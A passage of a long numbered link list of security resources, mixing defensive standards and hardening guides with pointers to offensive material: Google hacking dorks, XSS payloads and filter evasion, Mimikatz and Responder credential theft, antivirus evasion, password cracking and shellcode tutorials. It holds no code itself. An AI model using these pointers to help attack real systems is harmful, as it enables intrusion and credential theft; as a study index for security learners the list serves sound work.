:\n\n\n\n\nhttps://pastebin.com/y59kK2h0\n\n\n\n\n\n-1269-Dorks:\n\n\n\n\nhttps://pastebin.com/PKvZYMAa\n\n\n\n\n-1270-10k btc dorks:\n\n\n\nhttps://pastebin.com/vRnxvbCu\n\n\n\n\n-1271-7,000 Dorks for hacking into various sites:\n\n\n\nhttps://pastebin.com/n8JVQv3X\n\n\n\n-1272-List of information gathering search engines/tools etc:\n\n\nhttps://pastebin.com/GTX9X5tF\n\n\n\n-1273-FBOSINT:\n\n\n\nhttps://pastebin.com/5KqnFS0B\n\n\n\n-1274-Ultimate Penetration Testing:\n\n\n\nhttps://pastebin.com/4EEeEnXe\n\n\n\n-1275-massive list of information gathering search engines/tools :\n\n\n\nhttps://pastebin.com/GZ9TVxzh\n\n\n\n-1276-CEH Class:\n\n\n\nhttps://pastebin.com/JZdCHrN4\n\n\n\n-1277-CEH/CHFI Bundle Study Group Sessions:\n\n\n\nhttps://pastebin.com/XTwksPK7\n\n\n\n-1278-OSINT - Financial:\n\n\n\nhttps://pastebin.com/LtxkUi0Y\n\n\n\n\n-1279-Most Important Security Tools and Resources:\n\n\n\nhttps://pastebin.com/cGE8rG04\n\n\n\n-1280-OSINT resources from inteltechniques.com:\n\n\n\nhttps://pastebin.com/Zbdz7wit\n\n\n\n-1281-Red Team Tips:\n\n\nhttps://pastebin.com/AZDBAr1m\n\n\n\n-1282-OSCP Notes by Ash:\n\n\nhttps://pastebin.com/wFWx3a7U\n\n\n\n-1283-OSCP Prep:\n\n\nhttps://pastebin.com/98JG5f2v\n\n\n\n-1284-OSCP Review/Cheat Sheet:\n\n\n\nhttps://pastebin.com/JMMM7t4f\n\n\n\n-1285-OSCP Prep class:\n\n\nhttps://pastebin.com/s59GPJrr\n\n\n\n-1286-Complete Anti-Forensics Guide:\n\n\nhttps://pastebin.com/6V6wZK0i\n\n\n-1287-The Linux Command Line Cheat Sheet:\n\n\n\nhttps://pastebin.com/PUtWDKX5\n\n\n\n-1288-Command-Line Log Analysis:\n\n\nhttps://pastebin.com/WEDwpcz9\n\n\n\n-1289-An A-Z Index of the Apple macOS command line (OS X):\n\n\nhttps://pastebin.com/RmPLQA5f\n\n\n\n-1290-San Diego Exploit Development 2018:\n\n\nhttps://pastebin.com/VfwhT8Yd\n\n\n\n-1291-Windows Exploit Development Megaprimer:\n\n\nhttps://pastebin.com/DvdEW4Az\n\n\n\n-1292-Some Free Reverse engineering resources:\n\n\n\nhttps://pastebin.com/si2ThQPP\n\n\n\n\n-1293-Sans:\n\n\nhttps://pastebin.com/MKiSnjLm\n\n\n\n-1294-Metasploit Next Level:\n\n\nhttps://pastebin.com/0jC1BUiv\n\n\n\n-1295-Just playing around....:\n\n\n\nhttps://pastebin.com/gHXPzf6B\n\n\n\n-1296-Red Team Course:\n\n\nhttps://pastebin.com/YUYSXNpG\n\n\n\n-1297-New Exploit Development 2018:\n\n\n\nhttps://pastebin.com/xaRxgYqQ\n\n\n\n-1298-Good reviews of CTP/OSCE (in no particular order)::\n\n\n\nhttps://pastebin.com/RSPbatip\n\n\n\n-1299-Vulnerability Research Engineering Bookmarks Collection v1.0:\n\n\n\nhttps://pastebin.com/8mUhjGSU\n\n\n\n-1300-Professional-hacker's Pastebin :\n\n\n\nhttps://pastebin.com/u/Professional-hacker\n\n\n\n-1301-Google Cheat Sheet:\n\n\nhttp://www.googleguide.com/print/adv_op_ref.pdf\n\n\n\n-1302-Shodan for penetration testers:\n\n\n\nhttps://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf\n\n\n\n-1303-Linux networking tools:\n\n\n\nhttps://gist.github.com/miglen/70765e663c48ae0544da08c07006791f\n\n\n\n\n-1304-DNS spoofing with NetHunter:\n\n\n\nhttps://cyberarms.wordpress.com/category/nethunter-tutorial/\n\n\n\n\n-1305-Tips on writing a penetration testing report:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343\n\n\n\n\n-1306-Technical penetration report sample:\n\n\n\nhttps://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf\n\n\n\n\n\n-1307-Nessus sample reports:\n\n\n\nhttps://www.tenable.com/products/nessus/sample-reports\n\n\n\n\n-1308-Sample penetration testing report:\n\n\n\n\nhttps://www.offensive-security.com/reports/sample-penetration-testing-report.pdf\n\n\n\n\n-1309-jonh-the-ripper-cheat-sheet:\n\n\n\nhttps://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/\n\n\n\n\n-1310-ultimate guide to cracking foreign character passwords using hashcat:\n\n\n\nhttp://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has\n\n\n\n\n-1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III:\n\n\n\nhttps://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III\n\n\n\n\n-1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords:\n\n\n\nhttp://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/\n\n\n\n-1313-CSA (Cloud Security Alliance) Security White Papers:\n\n\n\nhttps://cloudsecurityalliance.org/download/\n\n\n\n-1314-NIST Security Considerations in the System Development Life Cycle:\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf\n\n\n\n\n-1315-ISO 29100 information technology security techniques privacy framework:\n\n\n\nhttps://www.iso.org/standard/45123.html\n\n\n\n\n-1316-NIST National Checklist Program:\n\n\n\nhttps://nvd.nist.gov/ncp/repository\n\n\n\n-1317-OWASP Guide to Cryptography:\n\n\n\nhttps://www.owasp.org/index.php/Guide_to_Cryptography\n\n\n\n-1318-NVD (National Vulnerability Database):\n\n\n\nhttps://nvd.nist.gov/\n\n\n\n-1319-CVE details:\n\n\n\nhttps://cvedetails.com/\n\n\n\n-1320-CIS Cybersecurity Tools:\n\n\n\n\nhttps://www.cisecurity.org/cybersecurity-tools/\n\n\n\n\n-1321-Security aspects of virtualization by ENISA:\n\n\n\nhttps://www.enisa.europa.eu/publications/security-aspects-of-virtualization/\n\n\n\n-1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes:\n\n\n\nhttps://www.cisecurity.org/cis-benchmarks/\n\n\n\n\n-1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer:\n\n\n\nhttps://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html\n\n\n\n\n-1324-Docker security:\n\n\n\nhttps://docs.docker.com/engine/security/security/\n\n\n\n\n-1325-Microsoft Security Development Lifecycle:\n\n\n\nhttp://www.microsoft.com/en-us/SDL/\n\n\n\n\n-1326-OWASP SAMM Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_SAMM_Project\n\n\n\n-1327-CWE/SANS Top 25 Most Dangerous Software Errors:\n\n\n\nhttps://cwe.mitre.org/top25/\n\n\n\n\n-1329-OWASP Vulnerable Web Applications Directory Project:\n\n\n\nhttps://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project\n\n\n\n\n-1330-CERT Secure Coding Standards:\n\n\nhttps://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards\n\n\n\n-1331-NIST Special Publication 800-53:\n\n\n\nhttps://nvd.nist.gov/800-53\n\n\n\n\n-1332-SAFECode Security White Papers:\n\n\n\n\nhttps://safecode.org/publications/\n\n\n\n\n-1333-Microsoft Threat Modeling tool 2016:\n\n\n\n\nhttps://aka.ms/tmt2016/\n\n\n\n\n-1334-Apache Metron for real-time big data security:\n\n\n\nhttp://metron.apache.org/documentation/\n\n\n\n\n-1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process:\n\n\n\nhttps://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf\n\n\n\n\n-1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\nhttp://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf\n\n\n\n\n\n-1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications:\n\n\n\n\nhttps://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items\n\n\n\n\n-1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf\n\n\n\n\n-1339-SAFECode Fundamental Practices for Secure Software Development:\n\n\n\nhttps://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf\n\n\n\n\n\n-1340-NIST 800-64 Security Considerations in the System Development Life Cycle:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final\n\n\n\n-1341-SANS A Security Checklist for Web Application Design:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1342-Best Practices for implementing a Security Awareness Program:\n\n\n\nhttps://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf\n\n\n\n\n-1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis:\n\n\n\nhttp://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf\n\n\n\n\n-1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems:\n\n\n\n\nhttps://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final\n\n\n\n\n-1345-SafeCode Tactical Threat Modeling:\n\n\n\nhttps://safecode.org/safecodepublications/tactical-threat-modeling/\n\n\n\n\n-1346-SANS Web Application Security Design Checklist:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389\n\n\n\n\n-1347-Data Anonymization for production data dumps:\n\n\n\nhttps://github.com/sunitparekh/data-anonymization\n\n\n\n\n-1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030\n\n\n\n\n-1349-Guide to Computer Security Log Management:\n\n\nhttps://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881\n\n\n\n\n-1350-Malware Indicators:\n\n\n\n\nhttps://github.com/citizenlab/malware-indicators\n\n\n\n\n-1351-OSINT Threat Feeds:\n\n\n\nhttps://www.circl.lu/doc/misp/feed-osint/\n\n\n\n\n-1352-SANS How to Use Threat Intelligence effectively:\n\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282\n\n\n\n\n-1353-NIST 800-150 Guide to Cyber Threat Information Sharing:\n\n\n\n\nhttps://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf\n\n\n\n\n-1354-Securing Web Application Technologies Checklist:\n\n\n\nhttps://software-security.sans.org/resources/swat\n\n\n\n-1355-Firmware Security Training:\n\n\n\n\nhttps://github.com/advanced-threat-research/firmware-security-training\n\n\n\n-1356-Burp Suite Bootcamp:\n\n\n\nhttps://pastebin.com/5sG7Rpg5\n\n\n\n\n-1357-Web app hacking:\n\n\n\nhttps://pastebin.com/ANsw7WRx\n\n\n\n\n-1358-XSS Payload:\n\n\n\nhttps://pastebin.com/EdxzE4P1\n\n\n\n-1359-XSS Filter Evasion Cheat Sheet:\n\n\n\nhttps://pastebin.com/bUutGfSy\n\n\n\n-1360-Persistence using RunOnceEx – Hidden from Autoruns.exe:\n\n\n\nhttps://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\n\n\n\n-1361-Windows Operating System Archaeology:\n\n\n\nhttps://www.slideshare.net/enigma0x3/windows-operating-system-archaeology\n\n\n\n-1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky:\n\n\n\nhttps://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/\n\n\n\n-1363-Malware Analysis using Osquery :\n\n\n\nhttps://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec\n\n\n\n-1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals :\n\n\n\nhttps://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/\n\n\n\n\n-1365-Userland registry hijacking:\n\n\n\nhttps://3gstudent.github.io/Userland-registry-hijacking/\n\n\n\n\n-1366-Malware Hiding Techniques to Watch for: AlienVault Labs:\n\n\n\nhttps://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs\n\n\n\n-1367- Full text of \"Google hacking for penetration testers\" :\n\n\n\nhttps://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt\n\n\n\n\n-1368- Full text of \"Long, Johnny Google Hacking For Penetration Testers\" :\n\n\n\nhttps://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1369- Full text of \"Coding For Penetration Testers\" :\n\n\n\nhttps://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt\n\n\n\n\n-1370- Full text of \"Hacking For Dummies\" :\n\n\n\nhttps://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt\n\n\n\n\n-1371-Full text of \"Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com\" :\n\n\n\n\nhttps://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt\n\n\n\n\n-1372- Full text of \"Social Engineering The Art Of Human Hacking\" :\n\n\n\nhttps://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt\n\n\n\n\n-1373- Full text of \"CYBER WARFARE\" :\n\n\n\nhttps://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt\n\n\n\n\n-1374-Full text of \"NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research\" :\n\n\n\n\nhttps://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt\n\n\n\n\n-1375- Full text of \"sectools\" :\n\n\n\n\nhttps://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt\n\n\n\n\n-1376- Full text of \"Aggressive network self-defense\" :\n\n\n\n\n\nhttps://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt\n\n\n\n\n\n-1377-Community Texts:\n\n\n\n\nhttps://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22\n\n\n\n\n-1378- Full text of \"Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)\" :\n\n\n\n\nhttps://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt\n\n\n\n\n-1379- Full text of \"Enzyclopedia Of Cybercrime\" :\n\n\n\nhttps://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt\n\n\n\n\n-1380- Full text of \"Information Security Management Handbook\" :\n\n\n\nhttps://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt\n\n\n\n\n\n-1381- Full text of \"ARMArchitecture Reference Manual\" :\n\n\n\n\nhttps://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt\n\n\n\n\n\n-1382- Full text of \"Metasploit The Penetration Tester S Guide\" :\n\n\n\nhttps://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt\n\n\n\n\n-1383-Tips & tricks to master Google’s search engine:\n\n\nhttps://medium.com/infosec-adventures/google-hacking-39599373be7d\n\n\n\n\n-1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) :\n\n\nhttps://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866\n\n\n\n\n-1385- Google Hacking Secrets:the Hidden Codes of Google :\n\n\n\nhttps://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google\n\n\n\n\n-1386-google hacking:\n\n\n\nhttps://www.slideshare.net/SamNizam/3-google-hacking\n\n\n\n\n\n-1387-How Penetration Testers Use Google Hacking:\n\n\n\n\nhttps://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking\n\n\n\n\n-1388-Free Automated Malware Analysis Sandboxes and Services:\n\n\n\nhttps://zeltser.com/automated-malware-analysis/\n\n\n\n\n-1389-How to get started with Malware Analysis and Reverse Engineering:\n\n\n\nhttps://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/\n\n\n\n-1390-Handy Tools And Websites For Malware Analysis:\n\n\n\nhttps://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/\n\n\n\n\n-1391-Dynamic Malware Analysis:\n\n\nhttps://prasannamundas.com/share/dynamic-malware-analysis/\n\n\n\n-1392-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1393-Detecting malware through static and dynamic techniques:\n\n\n\nhttps://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec...\n\n\n\n\n-1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools:\n\n\n\nhttps://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools\n\n\n\n-1395-Malware Analysis Lab At Home In 5 Steps:\n\n\n\nhttps://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/\n\n\n\n\n-1396-Malware Forensics Guide - Static and Dynamic Approach:\n\n\n\nhttps://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/\n\n\n\n\n-1397-Top 30 Bug Bounty Programs in 2019:\n\n\nhttps://www.guru99.com/bug-bounty-programs.html\n\n\n\n\n-1398-Introduction - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\n\n\n\n-1399-List of bug bounty writeups:\n\n\n\nhttps://pentester.land/list-of-bug-bounty-writeups.html\n\n\n\n\n-1400-Tips From A Bugbounty Hunter:\n\n\n\nhttps://www.secjuice.com/bugbounty-hunter/\n\n\n\n\n-1401-Cross Site Scripting (XSS) - Book of BugBounty Tips:\n\n\n\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss\n\n\n\n\n-1402-BugBountyTips:\n\n\n\nhttps://null0xp.wordpress.com/tag/bugbountytips/\n\n\n\n\n-1403-Xss Filter Bypass Payloads:\n\n\n\nwww.oroazteca.net/mq67/xss-filter-bypass-payloads.html\n\n\n\n\n-1404-Bug Bounty Methodology:\n\n\n\nhttps://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0\n\n\n\n-1405-GDB cheat-sheet for exploit development:\n\n\n\nwww.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html\n\n\n\n\n-1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n\n-1407-Exploit development tutorial :\n\n\n\nhttps://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux\n\n\n\n-1408-exploit code development:\n\n\nhttp://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf\n\n\n\n-1409-“Help Defeat Denial of Service Attacks: Step-by-Step”:\n\n\n\nhttp://www.sans.org/dosstep/\n\n\n\n\n-1410-Internet Firewalls: Frequently Asked Questions:\n\n\n\n\nhttp://www.interhack.net/pubs/fwfaq/\n\n\n\n\n-1411-Service Name and Transport Protocol Port Number:\n\n\n\nhttp://www.iana.org/assignments/port-numbers\n\n\n\n-1412-10 Useful Open Source Security Firewalls for Linux Systems:\n\n\n\nhttps://www.tecmint.com/open-source-security-firewalls-for-linux-systems/\n\n\n\n\n-1413-40 Linux Server Hardening Security Tips:\n\n\n\nhttps://www.cyberciti.biz/tips/linux-security.html\n\n\n\n\n-1414-Linux hardening: A 15-step checklist for a secure Linux server :\n\n\n\nhttps://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server\n\n\n\n-1415-25 Hardening Security Tips for Linux Servers:\n\n\n\nhttps://www.tecmint.com/linux-server-hardening-security-tips/\n\n\n\n\n-1416-How to Harden Unix/Linux Systems & Close Security Gaps:\n\n\n\nhttps://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps\n\n\n\n\n-1417-34 Linux Server Security Tips & Checklists for Sysadmins:\n\n\n\nhttps://www.process.st/server-security/\n\n\n\n\n-1418-Linux Hardening:\n\n\n\nhttps://www.slideshare.net/MichaelBoelen/linux-hardening\n\n\n\n\n-1419-23 Hardening Tips to Secure your Linux Server:\n\n\n\nhttps://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/\n\n\n\n\n-1420-What is the Windows Registry? :\n\n\nhttps://www.computerhope.com/jargon/r/registry.htm\n\n\n\n\n-1421-Windows Registry, Everything You Need To Know:\n\n\n\nhttps://www.gammadyne.com/registry.htm\n\n\n\n-1422-Windows Registry Tutorial:\n\n\n\nhttps://www.akadia.com/services/windows_registry_tutorial.html\n\n\n\n\n-1423-5 Tools to Scan a Linux Server for Malware and Rootkits:\n\n\n\nhttps://www.tecmint.com/scan-linux-for-malware-and-rootkits/\n\n\n\n-1424-Subdomain takeover dew to missconfigured project settings for Custom domain .:\n\n\n\nhttps://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969\n\n\n\n\n-1425-Massive Subdomains p0wned:\n\n\n\nhttps://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e\n\n\n\n-1426-Subdomain Takeover: Basics:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-basics/\n\n\n\n-1427-Subdomain Takeover: Finding Candidates:\n\n\n\nhttps://0xpatrik.com/subdomain-takeover-candidates/\n\n\n\n-1428-Bugcrowd's Domain & Subdomain Takeover!:\n\n\n\nhttps://bugbountypoc.com/bugcrowds-domain-takeover/\n\n\n\n\n-1429-What Are Subdomain Takeovers, How to Test and Avoid Them?:\n\n\n\nhttps://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid\n\n\n\n\n-1430-Finding Candidates for Subdomain Takeovers:\n\n\n\nhttps://jarv.is/notes/finding-candidates-subdomain-takeovers/\n\n\n\n\n-1431-Subdomain takeover of blog.snapchat.com:\n\n\n\nhttps://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7\n\n\n\n\n-1432-Hostile Subdomain takeove:\n\n\n\nhttps://labs.detectify.com/tag/hostile-subdomain-takeover/\n\n\n\n-1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users:\n\n\n\nhttps://www.safetydetective.com/blog/microsoft-outlook/\n\n\n\n\n-1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?:\n\n\n\nhttps://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/\n\n\n\n\n-1435-Subdomain takeover detection with AQUATONE:\n\n\n\nhttps://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/\n\n\n\n-1436-A hostile subdomain takeover! – Breaking application security:\n\n\n\nhttps://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/\n\n\n\n\n-1437-Web Development Reading List:\n\n\n\nhttps://www.smashingmagazine.com/2017/03/web-development-reading-list-172/\n\n\n\n\n-1438-CSRF Attack can lead to Stored XSS:\n\n\n\nhttps://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f\n\n\n\n-1439-What is Mimikatz: The Beginner's Guide | Varonis:\n\n\n\nhttps://www.varonis.com/bog/what-is-mimikatz\n\n\n\n-1440-Preventing Mimikatz Attacks :\n\n\n\nhttps://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5\n\n\n\n\n-1441-Mimikatz tutorial: How it hacks Windows passwords, credentials:\n\n\n\nhttps://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials\n\n\n\n\n-1442-Mimikatz: Walkthrough [Updated 2019]:\n\n\n\nhttps://resources.infosecinstitute.com/mimikatz-walkthrough/\n\n\n\n-1443-Mimikatz -Windows Tutorial for Beginner:\n\n\n\nhttps://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/\n\n\n\n\n-1444-Mitigations against Mimikatz Style Attacks:\n\n\n\nhttps://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks\n\n\n\n\n-1445-Exploring Mimikatz - Part 1 :\n\n\n\nhttps://blog.xpnsec.com/exploring-mimikatz-part-1/\n\n\n\n\n-1446-Powershell AV Evasion. Running Mimikatz with PowerLine:\n\n\n\nhttps://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html\n\n\n\n\n-1447-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n\n\n-1448-Retrieving NTLM Hashes without touching LSASS:\n\n\n\nhttps://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/\n\n\n\n\n-1449-From Responder to NT Authority\\SYSTEM:\n\n\n\n\nhttps://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319\n\n\n\n\n-1450-Getting Creds via NTLMv2:\n\n\n\nhttps://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html\n\n\n\n\n\n-1451-Living off the land: stealing NetNTLM hashes:\n\n\n\n\nhttps://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html\n\n\n\n\n\n-1452-(How To) Using Responder to capture passwords on a Windows:\n\n\n\nwww.securityflux.com/?p=303\n\n\n\n\n\n-1453-Pwning with Responder - A Pentester's Guide:\n\n\n\n\nhttps://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/\n\n\n\n\n-1454-LLMNR and NBT-NS Poisoning Using Responder:\n\n\n\n\nhttps://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/\n\n\n\n\n-1455-Responder - Ultimate Guide :\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/\n\n\n\n-1456-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1457-LM, NTLM, Net-NTLMv2, oh my! :\n\n\n\nhttps://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4\n\n\n\n\n-1458-SMB Relay Attack Tutorial:\n\n\n\n\nhttps://intrinium.com/smb-relay-attack-tutorial\n\n\n\n-1459-Cracking NTLMv2 responses captured using responder:\n\n\n\n\nhttps://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/\n\n\n\n\n-1460-Skip Cracking Responder Hashes and Relay Them:\n\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n\n\n-1461-Metasploit's First Antivirus Evasion Modules:\n\n\n\n\nhttps://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/\n\n\n\n\n-1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter:\n\n\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n\n\n\n-1463-Evading AV with Shellter:\n\n\n\nhttps://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/\n\n\n\n\n\n-1464-Shellter-A Shellcode Injecting Tool :\n\n\n\n\nhttps://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/\n\n\n\n\n-1465-Bypassing antivirus programs using SHELLTER:\n\n\n\nhttps://myhackstuff.com/shellter-bypassing-antivirus-programs/\n\n\n\n\n-1466-John the Ripper step-by-step tutorials for end-users :\n\n\n\nopenwall.info/wiki/john/tutorials\n\n\n\n\n-1467-Beginners Guide for John the Ripper (Part 1):\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n\n\n-1468-John the Ripper Basics Tutorial:\n\n\n\nhttps://ultimatepeter.com/john-the-ripper-basics-tutorial/\n\n\n\n\n-1469-Crack Windows password with john the ripper:\n\n\n\nhttps://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/\n\n\n\n\n-1470-Getting Started Cracking Password Hashes with John the Ripper :\n\n\n\nhttps://www.tunnelsup.com/getting-started-cracking-password-hashes/\n\n\n\n-1471-Shell code exploit with Buffer overflow:\n\n\n\nhttps://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b\n\n\n\n-1472-Shellcoding for Linux and Windows Tutorial :\n\n\n\nwww.vividmachines.com/shellcode/shellcode.html\n\n\n\n\n-1473-Buffer Overflow Practical Examples :\n\n\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5/\n\n\n\n\n-1474-Msfvenom shellcode analysis:\n\n\n\nhttps://snowscan.io/msfvenom-shellcode-analysis/\n\n\n\n\n-1475-Process Continuation 